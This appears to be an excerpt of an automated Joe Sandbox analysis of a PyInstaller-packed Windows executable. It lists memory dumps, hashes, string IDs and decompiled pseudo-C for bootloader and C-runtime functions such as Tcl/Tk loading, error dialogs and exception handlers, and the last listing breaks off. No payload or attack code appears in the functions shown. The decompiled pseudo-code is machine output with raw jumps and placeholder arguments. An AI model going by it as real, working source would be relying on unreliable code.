                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                              • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 2238633743-1453502826
                                                                                                                                                                                                                              • Opcode ID: 17d4bc1c5d01481622155459baf885f8433fc23e342d1d712b5c23d7f156d02b
                                                                                                                                                                                                                              • Instruction ID: 997d573ade011b664765bb16abcd523e2aedf521fa393e7eb51adc912ed37253
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17d4bc1c5d01481622155459baf885f8433fc23e342d1d712b5c23d7f156d02b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1E18CA6A1DB13B0EA56BB04E850574F3B6BF48F8CBC85535D40E062A5EF7CA645E330
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C41C40 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                              • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                              • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                              • Opcode ID: f63825339a4dd2598b7147fe8ca448bc86e3fa58851351c492cedb8a99883575
                                                                                                                                                                                                                              • Instruction ID: 4cfe112efc82fec92d9f7284d6babbc05542e66e6a15a591a7fdd1a268930433
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63825339a4dd2598b7147fe8ca448bc86e3fa58851351c492cedb8a99883575
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00A13877208B8296E7149F21E55479AF770F788B98F90422AEB8D03B24DF3DE165CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C623EC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1203COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C623EC(void* __edx, void* __rbx, unsigned int __rcx, void* __rdi, void* __rsi, long long __r9, signed int __r10, void* __r12, void* __r14, void* __r15) {
				signed long long _t32;
				void* _t43;
				void* _t45;
				void* _t46;
				signed long long _t47;
				long long _t54;

				_t43 = __rdi;
				_t45 = _t46 - 0x6e0;
				_t47 = _t46 - 0x7e0;
				_t32 =  *0x35c7b008; // 0x861d85c91f07
				 *(_t45 + 0x6d0) = _t32 ^ _t47;
				_t54 =  *((intOrPtr*)(_t45 + 0x740));
				 *(_t47 + 0x30) = __rcx;
				 *((long long*)(_t47 + 0x78)) = _t54;
				 *((long long*)(_t45 - 0x78)) = __r9;
				 *((intOrPtr*)(_t47 + 0x74)) = r8d;
				E00007FF77FF735C663A4(_t47 + 0x60);
				r15d = 1;
				if (( *(_t47 + 0x60) & 0x0000001f) != 0x1f) goto 0x35c62458;
				 *((char*)(_t47 + 0x68)) = 0;
				goto 0x35c62467;
				E00007FF77FF735C66410(( *(_t47 + 0x60) & 0x0000001f) - 0x1f, _t47 + 0x60);
				 *((intOrPtr*)(_t47 + 0x68)) = r15b;
				 *((long long*)(__r9 + 8)) = _t54;
				_t15 = _t43 + 0xd; // 0x2d
				_t22 =  <  ? _t15 : 0x20;
				r8d = 0;
				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
				E00007FF77FF735C66340(0, _t32 ^ _t47, _t47 + 0x70);
				r10d = 0x7ff;
				if (( *(_t47 + 0x30) >> 0x00000034 & __r10) != 0) goto 0x35c624d2;
			}









                                                                                                                                                                                                                              0x7ff735c623ec
                                                                                                                                                                                                                              0x7ff735c623f7
                                                                                                                                                                                                                              0x7ff735c623ff
                                                                                                                                                                                                                              0x7ff735c62406
                                                                                                                                                                                                                              0x7ff735c62410
                                                                                                                                                                                                                              0x7ff735c62417
                                                                                                                                                                                                                              0x7ff735c62421
                                                                                                                                                                                                                              0x7ff735c6242d
                                                                                                                                                                                                                              0x7ff735c62432
                                                                                                                                                                                                                              0x7ff735c62436
                                                                                                                                                                                                                              0x7ff735c6243b
                                                                                                                                                                                                                              0x7ff735c62444
                                                                                                                                                                                                                              0x7ff735c6244f
                                                                                                                                                                                                                              0x7ff735c62451
                                                                                                                                                                                                                              0x7ff735c62456
                                                                                                                                                                                                                              0x7ff735c6245d
                                                                                                                                                                                                                              0x7ff735c62462
                                                                                                                                                                                                                              0x7ff735c62473
                                                                                                                                                                                                                              0x7ff735c6247b
                                                                                                                                                                                                                              0x7ff735c6247e
                                                                                                                                                                                                                              0x7ff735c62481
                                                                                                                                                                                                                              0x7ff735c62486
                                                                                                                                                                                                                              0x7ff735c6248f
                                                                                                                                                                                                                              0x7ff735c62497
                                                                                                                                                                                                                              0x7ff735c624ae

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: d7bf5b06af259483f3237983e1ae6a375eb9caa94f39c19242adc711d5817f03
                                                                                                                                                                                                                              • Instruction ID: 16ac08d98f23b5a5afcf655eac22420ac85ee4fdcb5ff959b27cc66d8352518f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7bf5b06af259483f3237983e1ae6a375eb9caa94f39c19242adc711d5817f03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B2D173A182839BE7259F64D440BFDB7A1FB44B8CF985235DA0A57A84DB3CE600DB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C46DD0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00007FF735C42750), ref: 00007FF735C46DF7
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00000000,00007FF735C42750), ref: 00007FF735C46E26
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32 ref: 00007FF735C46E7C
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF735C47063,?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C42704
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: MessageBoxW.USER32 ref: 00007FF735C427DC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                              • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                              • Opcode ID: cf6486e795824517e2cf8401ead3efe2242c0aa5b222d18e16b935e7c9548593
                                                                                                                                                                                                                              • Instruction ID: 7f31693db0c408574e59cd3d032364081c4540e243bdf71ad13ad0de532a7c93
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf6486e795824517e2cf8401ead3efe2242c0aa5b222d18e16b935e7c9548593
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221B6B2618A43A6F720AB11E8446B5E3A2FF88B4CFC44135D54D426A9DF3CD145E720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4ACA0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                                                              			E00007FF77FF735C4ACA0(signed int __ecx, void* __rax, long long __rbx) {
				void* _t35;
				void* _t36;
				int _t38;
				void* _t58;
				void* _t76;
				long _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t58 = __rax;
				 *((long long*)(_t82 + 8)) = __rbx;
				_t80 = _t82 - 0x4c0;
				_t83 = _t82 - 0x5c0;
				if (IsProcessorFeaturePresent(_t79) == 0) goto 0x35c4acca;
				asm("int 0x29");
				_t35 = E00007FF77FF735C4AC98(_t34);
				r8d = 0x4d0;
				_t36 = E00007FF77FF735C4B800(_t35, 0, _t80 - 0x10, _t76, _t85);
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t58 == 0) goto 0x35c4ad4a;
				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
				r8d = 0x98;
				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
				E00007FF77FF735C4B800(_t36, 0, _t83 + 0x50,  *((intOrPtr*)(_t80 + 0x4d8)),  *((intOrPtr*)(_t80 + 0xe8)));
				 *((long long*)(_t83 + 0x60)) =  *((intOrPtr*)(_t80 + 0x4c8));
				 *((intOrPtr*)(_t83 + 0x50)) = 0x40000015;
				 *((intOrPtr*)(_t83 + 0x54)) = 1;
				_t38 = IsDebuggerPresent();
				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
				 *((long long*)(_t83 + 0x48)) = _t80 - 0x10;
				SetUnhandledExceptionFilter(??);
				if (UnhandledExceptionFilter(??) != 0) goto 0x35c4adda;
				if ((__ecx & 0xffffff00 | _t38 == 0x00000001) != 0) goto 0x35c4adda;
				return E00007FF77FF735C4AC98(_t40);
			}













                                                                                                                                                                                                                              0x7ff735c4aca0
                                                                                                                                                                                                                              0x7ff735c4aca0
                                                                                                                                                                                                                              0x7ff735c4aca6
                                                                                                                                                                                                                              0x7ff735c4acae
                                                                                                                                                                                                                              0x7ff735c4acc4
                                                                                                                                                                                                                              0x7ff735c4acc8
                                                                                                                                                                                                                              0x7ff735c4accf
                                                                                                                                                                                                                              0x7ff735c4acda
                                                                                                                                                                                                                              0x7ff735c4ace0
                                                                                                                                                                                                                              0x7ff735c4ace9
                                                                                                                                                                                                                              0x7ff735c4ad00
                                                                                                                                                                                                                              0x7ff735c4ad03
                                                                                                                                                                                                                              0x7ff735c4ad0c
                                                                                                                                                                                                                              0x7ff735c4ad0e
                                                                                                                                                                                                                              0x7ff735c4ad25
                                                                                                                                                                                                                              0x7ff735c4ad34
                                                                                                                                                                                                                              0x7ff735c4ad3d
                                                                                                                                                                                                                              0x7ff735c4ad44
                                                                                                                                                                                                                              0x7ff735c4ad56
                                                                                                                                                                                                                              0x7ff735c4ad66
                                                                                                                                                                                                                              0x7ff735c4ad70
                                                                                                                                                                                                                              0x7ff735c4ad77
                                                                                                                                                                                                                              0x7ff735c4ad83
                                                                                                                                                                                                                              0x7ff735c4ad88
                                                                                                                                                                                                                              0x7ff735c4ad90
                                                                                                                                                                                                                              0x7ff735c4ad98
                                                                                                                                                                                                                              0x7ff735c4ada6
                                                                                                                                                                                                                              0x7ff735c4adb2
                                                                                                                                                                                                                              0x7ff735c4adb9
                                                                                                                                                                                                                              0x7ff735c4adcc
                                                                                                                                                                                                                              0x7ff735c4add0
                                                                                                                                                                                                                              0x7ff735c4adea

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 333663dc33d654d66d543571e932939dd56a3b6e92fb8ea09484a59f459361f5
                                                                                                                                                                                                                              • Instruction ID: 06453b8794faf9e3055b5e9373c94781932f6f324ec9a03bef320e59079d457b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 333663dc33d654d66d543571e932939dd56a3b6e92fb8ea09484a59f459361f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24314F73608A8396EB609F60E8407EDB375FB84B48F844539DA4D47A98DF3CD648D720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59130 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                                                              			E00007FF77FF735C59130(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				int _t40;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t90 = _t92 - 0x4f0;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x35c7b008; // 0x861d85c91f07
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				if (__ecx == 0xffffffff) goto 0x35c5916f;
				_t37 = E00007FF77FF735C4AC98(_t36);
				r8d = 0x98;
				_t38 = E00007FF77FF735C4B800(_t37, 0, _t93 + 0x70, __rdx, __r8);
				r8d = 0x4d0;
				E00007FF77FF735C4B800(_t38, 0, _t90 + 0x10, __rdx, __r8);
				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
				_t65 = _t90 + 0x10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x35c59202;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				 *((long long*)(_t93 + 0x30)) = _t93 + 0x58;
				 *((long long*)(_t93 + 0x28)) = _t93 + 0x60;
				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = r8d;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x35c59264;
				if (_t40 != 0) goto 0x35c59264;
				if (__ecx == 0xffffffff) goto 0x35c59264;
				return E00007FF77FF735C4A410(E00007FF77FF735C4AC98(_t42), __ecx,  *(_t90 + 0x4e0) ^ _t93);
			}















                                                                                                                                                                                                                              0x7ff735c59130
                                                                                                                                                                                                                              0x7ff735c59135
                                                                                                                                                                                                                              0x7ff735c5913e
                                                                                                                                                                                                                              0x7ff735c59146
                                                                                                                                                                                                                              0x7ff735c5914d
                                                                                                                                                                                                                              0x7ff735c59157
                                                                                                                                                                                                                              0x7ff735c59168
                                                                                                                                                                                                                              0x7ff735c5916a
                                                                                                                                                                                                                              0x7ff735c59176
                                                                                                                                                                                                                              0x7ff735c5917c
                                                                                                                                                                                                                              0x7ff735c59187
                                                                                                                                                                                                                              0x7ff735c5918d
                                                                                                                                                                                                                              0x7ff735c59197
                                                                                                                                                                                                                              0x7ff735c591a0
                                                                                                                                                                                                                              0x7ff735c591a4
                                                                                                                                                                                                                              0x7ff735c591a9
                                                                                                                                                                                                                              0x7ff735c591be
                                                                                                                                                                                                                              0x7ff735c591c1
                                                                                                                                                                                                                              0x7ff735c591ca
                                                                                                                                                                                                                              0x7ff735c591cc
                                                                                                                                                                                                                              0x7ff735c591df
                                                                                                                                                                                                                              0x7ff735c591ec
                                                                                                                                                                                                                              0x7ff735c591f5
                                                                                                                                                                                                                              0x7ff735c591fc
                                                                                                                                                                                                                              0x7ff735c59209
                                                                                                                                                                                                                              0x7ff735c5921b
                                                                                                                                                                                                                              0x7ff735c5921f
                                                                                                                                                                                                                              0x7ff735c5922d
                                                                                                                                                                                                                              0x7ff735c59231
                                                                                                                                                                                                                              0x7ff735c59235
                                                                                                                                                                                                                              0x7ff735c5923f
                                                                                                                                                                                                                              0x7ff735c59252
                                                                                                                                                                                                                              0x7ff735c59256
                                                                                                                                                                                                                              0x7ff735c5925b
                                                                                                                                                                                                                              0x7ff735c5928a

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 89c850501309856a82a27e4ba18ad987b52bd1bd3e7502014d68c03547895541
                                                                                                                                                                                                                              • Instruction ID: 37cb6dc795231bef83061d65005d2d90500c908e2a3136ea17fe02a3d9d0442f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89c850501309856a82a27e4ba18ad987b52bd1bd3e7502014d68c03547895541
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49317E73608B8396EB609B25E8442AEB3B5FB88B58F940135EA9D43B59DF3CD145CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5FF28 Relevance: 7.8, APIs: 5, Instructions: 282COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                              			E00007FF77FF735C5FF28(void* __ecx, long long __rbx, intOrPtr* __rcx, void** __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r15;
				signed int _t70;
				void* _t77;
				signed int _t96;
				void* _t109;
				void* _t113;
				signed long long _t140;
				signed long long _t141;
				intOrPtr _t142;
				signed short* _t143;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t154;
				intOrPtr* _t156;
				intOrPtr* _t159;
				long long _t160;
				intOrPtr* _t161;
				signed short* _t167;
				signed short* _t168;
				signed long long _t180;
				signed long long _t182;
				long long _t186;
				signed long long _t202;
				void* _t207;
				intOrPtr* _t211;
				intOrPtr* _t212;
				void* _t214;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t225;
				signed long long _t226;
				void* _t228;
				void* _t239;
				signed long long _t240;
				long long _t241;
				void* _t244;
				union _FINDEX_INFO_LEVELS _t249;
				signed short* _t250;
				signed long long _t254;
				intOrPtr* _t255;
				WCHAR* _t258;
				signed long long _t260;

				 *((long long*)(_t225 + 0x18)) = __rbx;
				_t223 = _t225 - 0x1c0;
				_t226 = _t225 - 0x2c0;
				_t140 =  *0x35c7b008; // 0x861d85c91f07
				_t141 = _t140 ^ _t226;
				 *(_t223 + 0x1b8) = _t141;
				r12d = 0;
				 *((long long*)(_t226 + 0x50)) = __rdx;
				if (__rdx != 0) goto 0x35c5ff80;
				E00007FF77FF735C53B18(_t141);
				_t5 = _t239 + 0x16; // 0x16
				 *_t141 = _t5;
				E00007FF77FF735C59400();
				goto 0x35c602d8;
				asm("xorps xmm0, xmm0");
				 *__rdx = _t239;
				_t142 =  *((intOrPtr*)(__rcx));
				asm("movdqu [esp+0x30], xmm0");
				 *(_t226 + 0x40) = _t239;
				if (_t142 == 0) goto 0x35c601b0;
				 *((intOrPtr*)(_t223 + 0x1b0)) = 0x3f002a;
				 *((intOrPtr*)(_t223 + 0x1b4)) = r12w;
				E00007FF77FF735C5DC80(_t142, _t223 + 0x1b0);
				_t250 =  *((intOrPtr*)(__rcx));
				if (_t142 != 0) goto 0x35c60008;
				r8d = 0;
				_t167 = _t250;
				if (E00007FF77FF735C60318(0x801, _t167, _t223 + 0x1b0,  *((intOrPtr*)(_t226 + 0x38)), _t228, _t226 + 0x30) != 0) goto 0x35c60159;
